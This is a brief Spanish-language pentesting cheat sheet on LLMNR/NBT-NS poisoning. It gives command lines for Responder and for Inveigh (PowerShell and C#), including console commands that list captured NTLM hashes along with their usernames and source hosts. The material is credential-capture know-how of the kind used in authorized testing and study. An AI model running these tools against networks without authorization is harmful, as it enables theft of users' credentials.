LLMNR/NBT-NS poisoning

LLMNR, Link-Local Multicast Name Resolution / NBT-NS, NetBIOS Name Service

Responder

responder -I <interface> -A

-I =interfaz de red.
- <interface> = interfaz de red.
-A = modo de análisis, esta opción permite ver las solicitudes pero sin responder.

Inveigh

PowerShell Inveigh

Invoke-Inveigh Y -NBNS Y -ConsoleOutput Y -FileOutput Y

C# Inveigh (InveighZero)

.\Inveigh.exe

Presionar la tecla ESC para ingresar a la consola interactiva.

# Visualizar opciones de consola interactiva
HELP

# Visualizar hashes NTLM capturados por usuario
GET NTLMV1UNIQUE
GET NTLMV2UNIQUE

# Visualizar nombres de usuario y direcciones IPs/hostnames de origen
# para hashes NTLM capturados
GET NTLMV1USERNAMES
GET NTLMV2USERNAMES

AnteriorBypass protecciones PowerShell scripts SiguienteEnumeración no autenticada

Última actualización hace 2 años